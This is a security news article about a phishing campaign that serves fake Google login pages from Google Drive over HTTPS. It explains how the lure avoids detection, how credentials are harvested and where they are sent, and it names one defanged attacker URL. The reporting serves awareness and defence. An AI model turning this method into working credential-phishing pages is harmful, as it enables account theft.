New Phishing Campaign Targets Google Credentials

Researchers have found a new phishing campaign leveraging Google Drive in order to steal credentials.

Phishers have again leveraged users’ trust in Google with a newly discovered campaign designed to steal credentials that grant access to the multitude of Google’s online services.

New phishing pages hosted on Google Drive were discovered by researcher Aditya K. Sood of Elastica Cloud Threat Labs. This campaign has the earmarks of a similar one uncovered in March 2014, which like this one, presents the victim with a phony Google log-in page hosted on the Google platform and served over HTTPS. The phishing email subject lines are the same, “Document,” and the stolen credentials are hosted on a third-party server.

The campaign discovered by Elastica, however, adds a touch of additional code obfuscation to hide the phishing pages, indicating that if this is the same group behind both campaigns, their work is evolving and taking additional steps to elude detection.

“Using Google Drive for hosting phishing web pages provides an attacker with the ability to exploit the established trust users have with Google,” Sood said, adding that Google has removed the phishing pages.

Sood points out that the attackers are simply taking advantage of how Google Drive stores and presents content, saving themselves the time and effort it takes to properly craft an email-based phishing campaign. He points out also, that the fact that the pages are encrypted over HTTPS makes them less suspicious to employees trained to look for such things.

Access to Google credentials, in this case, is a big win for the attackers.

“In an effort to maximize benefits, attackers targeted Google users specifically so as to gain access to the multitude of services associated with those accounts, since Google uses Single Sign On (SSO) procedures,” Sood said.

Once the user receives the phishing email, which is sent from a Gmail address that’s likely been compromised, they’re asked to follow a Google Drive link. A phishing page that looks like a Google log-in page is served; if the user enters his credentials, he’s sent over plaintext to a compromised web server. The victim’s browser is then redirected to a PDF document hosted elsewhere, lending further credibility to the scam.

Sood says the emails are avoiding Google’s built-in detection capabilities, likely because they’re coming from a Gmail account and the link points to a legitimate googledrive.com domain.

Some elements on the phishing page, however, should rouse suspicion, Sood said.

“When you open ‘drive.google.com,’ Google redirects the browser to ‘accounts.google.com’ which carries the message, ‘One Account. All of Google,’ whereas this web page highlights the message ‘Google Drive. One Storage,’ which is not legitimate,” Sood said. “However, users targeted in this campaign might not notice this.”

The attackers also added a number of layers of obfuscated JavaScript to the phishing page, hiding among other things, the destination URL where the victim’s credentials are sent: hxxp://alarabia[.]my/images/Fresh/performact[.]php.

Sood said that Elastica has reported details of this campaign to Google.

Suggested articles

It’s Not the Trump Sex Tape, It’s a RAT

Criminals are using the end of the Trump presidency to deliver a new remote-access trojan (RAT) variant disguised as a sex video of the outgoing POTUS, researchers report.